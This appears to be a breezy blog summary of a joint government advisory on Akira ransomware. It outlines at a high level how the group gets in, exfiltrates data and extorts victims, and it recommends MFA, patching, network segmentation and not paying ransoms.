Unleashing the Beast: The Rise of Akira Ransomware and How to Fight Back

Hot Take:

Who needs a thriller when you have the Akira ransomware saga? As it morphs and multiplies, grabbing cash and crippling systems, it’s like watching a cybercrime blockbuster, minus the popcorn. The latest feature? A joint advisory from the cyber-superheroes at the FBI, CISA, Europol, and the Dutch NCSC. Buckle up, it’s going to be a bumpy ride!

• Akira ransomware has been wreaking havoc since March 2023, targeting entities across North America, Europe, and Australia, and has bagged about $42 million in ransom payments.
• The ransomware has evolved from targeting just Windows to also hitting Linux systems, specifically VMware ESXi hosts, with its fancy new variants like Megazord and Akira_v2.
• Initial entry is often through VPNs without multifactor authentication (MFA), exploiting known vulnerabilities, with a penchant for Cisco’s weak spots.
• Akira uses a double-extortion tactic: first, it exfiltrates data, then encrypts systems, and finally demands ransom through a .onion URL, only revealing payment instructions upon contact.
• Agencies recommend robust defenses including MFA, regular patching, network segmentation, and, importantly, not paying the ransom to avoid fueling the cybercrime economy.

Need to know more?

The Evolutionary Leap

From humble C++ beginnings to a Rust-based powerhouse, Akira has gone all “Transformers” on us, upgrading its extortion capabilities. Early 2023 saw Akira sticking to Windows, but by April, it had its cyber tentacles around Linux too. The ransomware actors seem to have a flair for dramatic naming too, with file extensions like .akira and .powerranges. Yes, you read that right, Power Rangers.

The Art of Breaking In

These cyber villains are sneaky. They slide into networks through VPNs that skipped the MFA memo, using old Cisco vulnerabilities as their backdoor keys. Once they’re in, it’s game over. They start their party by disabling security software and using tools like AnyDesk and MobaXterm to move laterally and maintain control.

Grab and Encrypt

Akira doesn’t just lock up your data; first, it takes a copy, ensuring they can still haunt you even if you manage to recover from backups. They use tools like WinRAR and RClone to pack up your precious data and send it off to their lairs. After making sure they’ve left no stone unturned (or file unencrypted), they drop a ransom note, uniquely coded for each victim, instructing them on how to reach out and pay up in Bitcoin.

Defense: The Best Offense

The advisory doesn’t just spell doom; it offers a shield too. Recommendations include the classics: update and patch systems, segment networks, and enforce MFA like your network’s life depends on it (because it does!). Also on the list is keeping an eye out for abnormal activity, which could be the first sign of a breach. And while the agencies are firm on their stance against paying ransoms, they suggest beefing up defenses to make sure Akira actors don’t get a chance to lock anything down.

Not Just a Warning—A Resource

It’s not all gloom and doom. The advisory serves up a silver lining with resources like StopRansomware.gov, offering tools and guidance to help keep the digital boogeymen at bay. So, while Akira might be out there leveling up, the good guys aren’t exactly sitting ducks. They’re more like sitting hackers, armed with the cyber equivalent of firewalls, antivirus software, and a staunch no-ransom policy.

The cyber realm might be a battlefield, but with advisories like these, at least we’re not heading into battle unarmed. So, update those systems, folks, and maybe, just maybe, we can turn the tide against our digital adversaries.